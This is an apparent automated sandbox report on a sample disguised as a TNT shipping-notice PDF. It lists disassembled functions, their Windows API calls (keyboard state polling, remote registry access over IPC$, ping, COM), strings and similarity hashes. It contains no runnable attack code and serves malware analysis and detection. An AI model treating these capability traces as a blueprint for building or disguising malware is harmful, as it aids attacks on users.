mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0092EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0092EAA7

Strings

play PlayMe, xrefs: 0092EAA2
play PlayMe wait, xrefs: 0092EA91
alias PlayMe, xrefs: 0092EA36
open , xrefs: 0092EA0C
close PlayMe, xrefs: 0092EA6E, 0092EA9B
status PlayMe mode, xrefs: 0092EA58

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: df5ea2c2495e954087c7db5ff4189fea78c485e6a6ddadf1f755b171f0e1b955
Instruction ID: 6919f1d63f77e24b456a289e489aa75b01cc27ce522a2d436ea023401c0e40a4
Opcode Fuzzy Hash: df5ea2c2495e954087c7db5ff4189fea78c485e6a6ddadf1f755b171f0e1b955
Instruction Fuzzy Hash: 4611C631A5026979D720B7A5EC4AEFF6A7CFBD1B04F000429B401E61D0EE704D45C6B1

Function 00925CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00925CE2
GetWindowRect.USER32(00000000,?), ref: 00925CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00925D59
GetDlgItem.USER32(?,00000002), ref: 00925D69
GetWindowRect.USER32(00000000,?), ref: 00925D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00925DCF
GetDlgItem.USER32(?,000003E9), ref: 00925DDD
GetWindowRect.USER32(00000000,?), ref: 00925DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00925E31
GetDlgItem.USER32(?,000003EA), ref: 00925E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00925E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00925E67

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 3cb2c093f7a1106b2206fd7195c93a552c7ae6a233c0c254da30bf6e405625d0
Instruction ID: 2398b197893ae6891493a4b81c83a8f2f5388db538c018c9e8dd55f23a4592b6
Opcode Fuzzy Hash: 3cb2c093f7a1106b2206fd7195c93a552c7ae6a233c0c254da30bf6e405625d0
Instruction Fuzzy Hash: 72512DB1A10715AFDF18CF69DD89AAEBBB9FB48301F118129F915E6294D7709E00CB50

Function 008D8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 008D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008D8BE8,?,00000000,?,?,?,?,008D8BBA,00000000,?), ref: 008D8FC5

DestroyWindow.USER32(?), ref: 008D8C81
KillTimer.USER32(00000000,?,?,?,?,008D8BBA,00000000,?), ref: 008D8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00916973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,008D8BBA,00000000,?), ref: 009169A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,008D8BBA,00000000,?), ref: 009169B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008D8BBA,00000000), ref: 009169D4
DeleteObject.GDI32(00000000), ref: 009169E6

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e6ab34c11621d399b8a28d1856379210caf9268eef7e5b02348609ee931ce2b2
Instruction ID: d849478f5b407f54757bcc772a76fed4fb42bda94297414f3807f45a515c31fd
Opcode Fuzzy Hash: e6ab34c11621d399b8a28d1856379210caf9268eef7e5b02348609ee931ce2b2
Instruction Fuzzy Hash: 50618C31626709DFCB269F29D948B6977F5FB50316F14461AE042DBAA0CB31ADC0EF90

Function 008D9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 008D9944: GetWindowLongW.USER32(?,000000EB), ref: 008D9952

GetSysColor.USER32(0000000F), ref: 008D9862

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 71937e9c30a3e754b953c022769084e61a430167dcbde217ff033f0ffd95e503
Instruction ID: 31bf2b6f974f690bbe3935bc4a00559907e448a44596271fb69cc0decc3101f8
Opcode Fuzzy Hash: 71937e9c30a3e754b953c022769084e61a430167dcbde217ff033f0ffd95e503
Instruction Fuzzy Hash: 87419071108744AFDB205F799C84BB93B6AFB06722F144756F9E2872E1D7319942EB10

Function 009296E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0090F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00929717
LoadStringW.USER32(00000000,?,0090F7F8,00000001), ref: 00929720

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0090F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00929742
LoadStringW.USER32(00000000,?,0090F7F8,00000001), ref: 00929745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00929866

Strings

^ ERROR, xrefs: 009297FB
Error: , xrefs: 0092981D
Line %d:, xrefs: 009297A0
Line %d (File "%s"):, xrefs: 0092978F
%s (%d) : ==> %s: %s %s, xrefs: 0092984A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 3518e4c1505d8ee14350df6345a5153c24913208bf044059b32128f24116ba5b
Instruction ID: 7f43ffb67b0ec3a90b410bcd041212d1ead8e36d2421e589d3ca044028893044
Opcode Fuzzy Hash: 3518e4c1505d8ee14350df6345a5153c24913208bf044059b32128f24116ba5b
Instruction Fuzzy Hash: BB415E72904219AADB04FBE4ED46EEE7778FF54340F100169F605B2192EB35AF49CB62

Function 009206DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 008C6B57: _wcslen.LIBCMT ref: 008C6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009207A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009207BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009207DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00920804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0092082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00920837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0092083C

Strings

SOFTWARE\Classes\, xrefs: 0092070E
\IPC$, xrefs: 00920784
\CLSID, xrefs: 00920724

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: ee1fa3ce57223c128adbfa499e62390cff441988b9a1591bf15850057d8800c5
Instruction ID: 01d8a4fb8baeea87a809b2fa1e47f97720d43d0c58e6ef66cafb63be85b66bd5
Opcode Fuzzy Hash: ee1fa3ce57223c128adbfa499e62390cff441988b9a1591bf15850057d8800c5
Instruction Fuzzy Hash: 9D410872C10229ABDF15EBA4EC85DEEB778FF44354F454169E901A32A1EB309E04CB91

Function 00943C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00943C5C
CoInitialize.OLE32(00000000), ref: 00943C8A
CoUninitialize.OLE32 ref: 00943C94
_wcslen.LIBCMT ref: 00943D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00943DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00943ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00943F0E
CoGetObject.OLE32(?,00000000,0095FB98,?), ref: 00943F2D
SetErrorMode.KERNEL32(00000000), ref: 00943F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00943FC4
VariantClear.OLEAUT32(?), ref: 00943FD8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 11f1a0f0f3d7da9615a03fb3abd9b2ab49b0842be85801d9bde6aecc26a144be
Instruction ID: 30c88117dfadb9bd974c50a295be729a72334629f117f77209e25ad2aeff64b3
Opcode Fuzzy Hash: 11f1a0f0f3d7da9615a03fb3abd9b2ab49b0842be85801d9bde6aecc26a144be
Instruction Fuzzy Hash: 31C101B1608305AF9700DF69C884D2BBBE9FF89748F10895DF98A9B251D731EE05CB52

Function 00937A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00937AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00937B8F
SHGetDesktopFolder.SHELL32(?), ref: 00937BA3
CoCreateInstance.OLE32(0095FD08,00000000,00000001,00986E6C,?), ref: 00937BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00937C74
CoTaskMemFree.OLE32(?,?), ref: 00937CCC
SHBrowseForFolderW.SHELL32(?), ref: 00937D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00937D7A
CoTaskMemFree.OLE32(00000000), ref: 00937D81
CoTaskMemFree.OLE32(00000000), ref: 00937DD6
CoUninitialize.OLE32 ref: 00937DDC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 4b2d8d96354469f5907f35206e004724ff2c1c812c3cb6baa8e83561042d2dd8
Instruction ID: 77ca9a90a4b9cd9eb38c5a8f8a29c6fd1338e9318bcfcc6c976bb0aedc064f18
Opcode Fuzzy Hash: 4b2d8d96354469f5907f35206e004724ff2c1c812c3cb6baa8e83561042d2dd8
Instruction Fuzzy Hash: 08C1E7B5A04209AFCB14DFA4C884DAEBBB9FF48304F148499E919DB261D730EE45CF90

Function 0095541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00955504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00955515
CharNextW.USER32(00000158), ref: 00955544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00955585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0095559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009555AC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: c32d602375e252517675e9ba926d68ce9ec1f230d36f22b21124e20918752491
Instruction ID: 4bc7c150870ae7f4a7de99ec1f834dfe0b0c2d75b3a4b963111aef1750a340cd
Opcode Fuzzy Hash: c32d602375e252517675e9ba926d68ce9ec1f230d36f22b21124e20918752491
Instruction Fuzzy Hash: DB61B070904609EFDF10CF96CCA4AFE7BB9FB05322F114445F925A72A2D7348A89DB60

Function 0091FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0091FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0091FB08
VariantInit.OLEAUT32(?), ref: 0091FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0091FB3A
VariantCopy.OLEAUT32(?,?), ref: 0091FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0091FBA1
VariantClear.OLEAUT32(?), ref: 0091FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0091FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0091FBCC
VariantClear.OLEAUT32(?), ref: 0091FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0091FBE9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: d000ea5671e42d5a906d9a2d3e3407ede17bc6eb46fd8a99b2ce53c4ab3b5dd8
Instruction ID: 5e6b0180a3ecb3fd2db8e3d77c0516a50039f3eeb9d82b4835970f89c4281ebb
Opcode Fuzzy Hash: d000ea5671e42d5a906d9a2d3e3407ede17bc6eb46fd8a99b2ce53c4ab3b5dd8
Instruction Fuzzy Hash: C3416075A0421D9FCB00DF68C864DEDBBB9FF48345F008069E819A7261DB34A946CB90

Function 00929C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00929CA1
GetAsyncKeyState.USER32(000000A0), ref: 00929D22
GetKeyState.USER32(000000A0), ref: 00929D3D
GetAsyncKeyState.USER32(000000A1), ref: 00929D57
GetKeyState.USER32(000000A1), ref: 00929D6C
GetAsyncKeyState.USER32(00000011), ref: 00929D84
GetKeyState.USER32(00000011), ref: 00929D96
GetAsyncKeyState.USER32(00000012), ref: 00929DAE
GetKeyState.USER32(00000012), ref: 00929DC0
GetAsyncKeyState.USER32(0000005B), ref: 00929DD8
GetKeyState.USER32(0000005B), ref: 00929DEA

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 500973e95160e13be8f2556ba2be9cf0eef6135f2b47c3cec4867d1b88a3bef0
Instruction ID: d85cd371bab0e2fdc9ef79e8a0a3c26d3ec6eb140c904754cba523a867d16dd2
Opcode Fuzzy Hash: 500973e95160e13be8f2556ba2be9cf0eef6135f2b47c3cec4867d1b88a3bef0
Instruction Fuzzy Hash: 31410B745087DA6DFF30D760E8043B5BEE86F11344F04805EEAC6566C6EBA49DC8D7A2

Function 0094055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009405BC
inet_addr.WSOCK32(?), ref: 0094061C
gethostbyname.WSOCK32(?), ref: 00940628
IcmpCreateFile.IPHLPAPI ref: 00940636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009406C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009406E5
IcmpCloseHandle.IPHLPAPI(?), ref: 009407B9
WSACleanup.WSOCK32 ref: 009407BF

Strings

Ping, xrefs: 00940676

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 49e76adec3b58bd10dbbd791b726040c99dbdd97838f113f6dc4de4ca1b2e2d5
Instruction ID: e17431bfd9ea17bb4ad8449b1764fffff87fa828049325add18d0c198f817ed5
Opcode Fuzzy Hash: 49e76adec3b58bd10dbbd791b726040c99dbdd97838f113f6dc4de4ca1b2e2d5
Instruction Fuzzy Hash: 10916C755083019FD320DF19C889F1ABBE4EF84318F1589A9E56A8B6A2C730ED41CF92

Function 00948CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00948CF3

Part of subcall function 00928E54: _wcslen.LIBCMT ref: 00928E77

_wcslen.LIBCMT ref: 00948D4E
_wcslen.LIBCMT ref: 00948D9C
_wcslen.LIBCMT ref: 00948DDC
_wcslen.LIBCMT ref: 00948E6E

Strings

cdecl, xrefs: 00948D48, 00948D4D
stdcall, xrefs: 00948DD6, 00948DDB
winapi, xrefs: 00948D96, 00948D9B
none, xrefs: 00948E65, 00948E6A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: d1a61011af12b11698ea0d1abaea7b5efc4fa0f58ee5285b7b9c278428569e74
Instruction ID: b21f34651c430546a3adce1f9231d55434d74a71bf36eb510267f872b5697b99
Opcode Fuzzy Hash: d1a61011af12b11698ea0d1abaea7b5efc4fa0f58ee5285b7b9c278428569e74
Instruction Fuzzy Hash: 7951AF31A001169BCB24EFACC940DBFB7A9FF64324B214629E826E72C4EB35DD40C791

Function 0094372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00943774
CoUninitialize.OLE32 ref: 0094377F
CoCreateInstance.OLE32(?,00000000,00000017,0095FB78,?), ref: 009437D9
IIDFromString.OLE32(?,?), ref: 0094384C
VariantInit.OLEAUT32(?), ref: 009438E4
VariantClear.OLEAUT32(?), ref: 00943936

Strings

Failed to create object, xrefs: 009437E4, 0094389A
Invalid parameter, xrefs: 00943865
NULL Pointer assignment, xrefs: 0094381E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 0969bfafe9caa2c8cd50aa3301425e683508aa09d125d9a66e867ac5a3f359b3
Instruction ID: a2c5d753f58a8d32c8c9249613430e858fe5413eadfb70ee1680471356b75ac8
Opcode Fuzzy Hash: 0969bfafe9caa2c8cd50aa3301425e683508aa09d125d9a66e867ac5a3f359b3
Instruction Fuzzy Hash: 28618EB0608311AFD310DF64C849F5ABBE8EF88715F108919F9959B391D770EE48CB92

Function 00933388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009333CF

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009333F0

Strings

Incorrect parameters to object property !, xrefs: 009334AB
Error: , xrefs: 009334D1
^ ERROR , xrefs: 0093349E
"%s" (%d) : ==> %s:, xrefs: 00933522
"%s" (%d) : ==> %s:%s%s, xrefs: 00933504
Line %d (File "%s"):, xrefs: 00933443, 0093345C

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
